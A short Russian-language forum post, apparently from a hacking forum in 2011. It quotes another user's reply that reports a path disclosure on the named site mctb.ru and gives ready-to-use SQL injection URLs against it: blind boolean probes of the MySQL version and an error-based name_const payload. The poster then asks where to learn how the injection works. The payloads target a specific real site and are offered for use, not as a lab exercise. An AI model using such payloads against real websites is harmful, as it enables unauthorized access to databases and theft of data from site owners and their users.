23.05.2011, 05:21
|
|
Новичок
Регистрация: 17.04.2011
Сообщений: 7
Провел на форуме:
1531
Репутация:
0
|
|
Сообщение от DIEZalok
Ну раскрытие путей точно есть, дальше без кода сразу не определить.
Я думаю тебе будет полезно(пробелы убрать):
http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=5,1,2)) >>> true
http://mctb.ru/comments/(0)or(1=if((select(mid(version(),1,1)))=4,1,2)) >>> false
http://mctb.ru/comments/(0)and(select*from(select(name_const(version(),3)) ,name_const(version(),3))a)
Слушай, а где можно почитать, про то, что ты сделал?
Вроде похоже на SQL инъекцию. Но хоть ты убей не могу понять, как она тут работает...
|
|
|